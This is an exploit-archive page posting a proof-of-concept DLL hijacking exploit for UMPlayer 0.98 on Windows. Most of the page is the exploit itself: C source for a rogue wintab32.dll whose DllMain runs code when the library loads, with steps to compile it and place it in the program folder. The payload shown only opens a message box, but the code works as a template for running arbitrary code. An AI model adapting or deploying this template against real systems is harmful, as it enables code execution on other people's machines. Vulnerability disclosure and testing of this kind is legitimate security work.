UMPlayer 0.98 DLL Hijacking wintab32.dll Exploit

2012-10-31 / 2012-11-01

Credit: Metropolis

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

/*
# Exploit Title: UMPlayer 0.98 DLL Hijacking Exploit (wintab32.dll)
# Date: 31/10/2012
# Author: Metropolis
# Url: http://metropolis.fr.cr
# Software info: UMPlayer is the media player that fills all your needs.
# With dozens of advanced features and built-in codecs it can handle any media format.
# Software Link: http://www.umplayer.com/download/
# Version: 0.98
# Tested on: Windows 7
# Instructions:
# 1. Compile dll
# gcc -shared -o wintab32.dll wintab32.c
# 2. Add wintab32.dll
# C:\Program Files (x86)\UMPlayer
# 3. Launch UMPlayer.exe
# 4. MessageBox DLL Hijacked!
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}

References:

http://www.umplayer.com/download/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

UMPlayer 0.98 DLL Hijacking wintab32.dll Exploit

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.